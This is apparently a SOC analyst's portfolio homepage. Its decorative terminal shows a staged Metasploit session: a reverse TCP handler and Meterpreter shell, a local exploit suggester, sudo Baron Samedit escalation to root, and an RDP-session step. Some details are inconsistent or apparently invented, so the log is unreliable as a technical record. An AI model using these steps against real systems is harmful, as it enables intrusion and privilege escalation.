// CLIENT_SYSTEM_DATA
IPV4_ADDR: 0.0.0.0ISP_PROV: DETECTING...OS_KERNEL: DETECTING...BROWSER: ...STATE: ...CITY: ...
> CONNECTION_ESTABLISHED:SECURE
Hi,
I'm
Prem
SOC_Analyst
Terminal
msf6 exploit(handler) >run
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Sending stage (175686 bytes) to 192.168.1.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 192.168.1.1:5678)
meterpreter > getuid
Server username: ubuntu-workstation\low-priv-user
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.1.1 - Collecting local exploits...
[+] 192.168.1.1 - exploit/linux/local/sudo_baron_samedit: Valid
meterpreter > use exploit/linux/local/sudo_baron_samedit
meterpreter > run
[+] Escalating privileges...
[+] Success! Target compromised.
meterpreter > getuid
Server username: root
meterpreter > run post/multi/manage/open_rdp_session
[*] Target: UBUNTU-WORKSTATION-01 (192.168.1.1)
[*] Authenticating with local session tokens...
[*] Access Granted. Initializing GUI...
ubuntu-24.04 [Running]
AboutMe.md
Certs.md
Projects.md
Contact.md